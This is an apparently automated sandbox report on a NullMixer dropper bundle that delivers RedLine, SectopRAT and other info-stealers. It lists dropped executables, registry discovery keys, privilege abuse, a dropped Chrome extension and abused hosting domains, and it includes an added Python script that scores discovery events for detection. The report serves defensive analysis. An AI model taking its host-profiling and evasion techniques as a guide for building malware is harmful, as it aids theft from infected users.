Malware Analysis Report

2025-01-02 05:58

Sample ID 241122-jcqjqasndn
Target 54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe
SHA256 54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c
Tags
fabookie gcleaner nullmixer onlylogger privateloader redline sectoprat socelars chris media21 sehrish aspackv2 discovery dropper execution infostealer loader rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral4 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral1 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral2 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral3 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
10/10

SHA256

54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c

Threat Level: Known bad

The file 54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe was found to be: Known bad.

Malicious Activity Summary

Tags: fabookie gcleaner nullmixer onlylogger privateloader redline sectoprat socelars chris media21 sehrish aspackv2 discovery dropper execution infostealer loader rat spyware stealer trojan

Family signatures (family, family tag, payload detection):
Fabookie, Fabookie family, Detect Fabookie payload
GCleaner, Gcleaner family
NullMixer, Nullmixer family
OnlyLogger, Onlylogger family, OnlyLogger payload
PrivateLoader, Privateloader family
RedLine, Redline family, RedLine payload
SectopRAT, Sectoprat family, SectopRAT payload
Socelars, Socelars family, Socelars payload

Behavioral signatures:
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Reads user/profile data of web browsers
Executes dropped EXE
ASPack v2.12-2.42
Loads dropped DLL
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Looks up geolocation information via web service
Drops Chrome extension
Blocklisted process makes network request
Suspicious use of SetThreadContext
Program crash
Unsigned PE
System Location Discovery: System Language Discovery
Browser Information Discovery
Enumerates physical storage devices
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Kills process with taskkill
Enumerates system info in registry
Modifies Internet Explorer settings
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies data under HKEY_USERS
Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-22 07:31

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-22 07:31

Reported

2024-11-22 07:33

Platform

win10v2004-20241007-en

Max time kernel

86s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload: 1 evidence row (all fields N/A)
Fabookie (tags: spyware stealer fabookie)
Fabookie family (tag: fabookie)
GCleaner (tags: loader gcleaner)
Gcleaner family (tag: gcleaner)
NullMixer (tags: dropper nullmixer)
Nullmixer family (tag: nullmixer)
OnlyLogger (tags: loader onlylogger)
Onlylogger family (tag: onlylogger)
PrivateLoader (tags: loader privateloader)
Privateloader family (tag: privateloader)
RedLine (tags: infostealer redline)
RedLine payload: 3 evidence rows (all fields N/A)
Redline family (tag: redline)
SectopRAT (tags: trojan rat sectoprat)
SectopRAT payload: 1 evidence row (all fields N/A)
Sectoprat family (tag: sectoprat)
Socelars (tags: stealer socelars)
Socelars family (tag: socelars)
Socelars payload: 1 evidence row (all fields N/A)
OnlyLogger payload: 2 evidence rows (all fields N/A)

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu122f7469b214cb59.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1262fd911d3e6320.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12b275ee70c7e913.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu120bfbc2443b3b5d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu124078ed79bdbd5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu123e05ebe43921.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12ca1c119bc29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5BQ15.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu122f7469b214cb59.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu124078ed79bdbd5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-5BQ15.tmp\Thu125e541847539.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu123e05ebe43921.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1262fd911d3e6320.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12ca1c119bc29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe N/A
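The three registry checks above are the sandbox's evidence for location, language and storage-device discovery. Control Panel\International\Geo\Nation holds the Windows GeoID of the configured country and is the usual value a loader reads when deciding whether to run on a host at all; Enum\SCSI exposes the identifiers of attached disks, which is commonly read to spot virtual-machine disk names; NLS\Language is opened by almost every process during start-up, so on its own it is noise, which is why cmd.exe, msiexec.exe and taskkill.exe fill that table. The Python below is an added example, not code from the report or from the sandbox, that scores rows in the report's own row format per process so the Geo\Nation and SCSI readers stand out from the language-key noise. The weights, the extra points for binaries running from %TEMP% and for script hosts reading Geo\Nation, and the threshold are assumptions chosen for illustration; the sample rows are a constructed subset of the tables above.

```python
"""Score registry-discovery events (Geo\\Nation, NLS\\Language, Enum\\SCSI) per process.

Row shape, as in the report:  <operation> <registry key> <process path> N/A
"""
import re
from collections import defaultdict
from ntpath import basename

# Key patterns (case-insensitive) and the discovery category each maps to.
KEY_CATEGORIES = [
    (re.compile(r"\\Control Panel\\International\\Geo\\Nation$", re.I), "geo_nation"),
    (re.compile(r"\\Control\\NLS\\Language$", re.I), "nls_language"),
    (re.compile(r"\\Enum\\SCSI(\\|$)", re.I), "scsi_enum"),
]
# Assumed weights: NLS\Language is read by nearly every process at start-up, so on
# its own it is noise; Geo\Nation and Enum\SCSI are rarely needed by ordinary software.
WEIGHTS = {"geo_nation": 3, "scsi_enum": 3, "nls_language": 1}
UNTRUSTED_PATH = re.compile(r"^C:\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.I)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
ROW_RE = re.compile(r"^(Key value queried|Key queried|Key opened|Key enumerated) (.+) N/A$")


def parse_rows(text):
    """Return (operation, key, process_path) tuples; the key may contain spaces,
    so the split is taken at the last ' C:\\' in the row."""
    events = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        key, sep, proc = m.group(2).rpartition(" C:\\")
        if sep:
            events.append((m.group(1), key, "C:\\" + proc))
    return events


def classify(key):
    for pattern, category in KEY_CATEGORIES:
        if pattern.search(key):
            return category
    return None


def score_processes(events):
    """Process path -> {'categories': set, 'score': int}."""
    cats = defaultdict(set)
    for _op, key, proc in events:
        category = classify(key)
        if category:
            cats[proc].add(category)
    result = {}
    for proc, categories in cats.items():
        score = sum(WEIGHTS[c] for c in categories)
        if UNTRUSTED_PATH.match(proc):
            score += 2          # dropped binary running from the user's %TEMP%
        if "geo_nation" in categories and basename(proc).lower() in SCRIPT_HOSTS:
            score += 2          # the country check is being done from script
        result[proc] = {"categories": categories, "score": score}
    return result


def flagged(events, threshold=4):
    """(score, image name) for every process at or above the threshold, highest first."""
    hits = [(v["score"], basename(p))
            for p, v in score_processes(events).items() if v["score"] >= threshold]
    return sorted(hits, key=lambda h: (-h[0], h[1].lower()))


# Constructed sample: a subset of the rows from the three tables above.
SAMPLE_ROWS = r"""Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe N/A"""

if __name__ == "__main__":
    for score, name in flagged(parse_rows(SAMPLE_ROWS)):
        print(f"{score:>2}  {name}")
```

With these weights the SCSI reader Thu12465fe68f85b6156.exe scores highest, the two dropped binaries and the mshta.exe script that read Geo\Nation follow, and the cmd.exe and powershell.exe rows that only opened NLS\Language stay below the threshold.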

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133767343342817050" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12ca1c119bc29.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12b275ee70c7e913.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu122f7469b214cb59.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
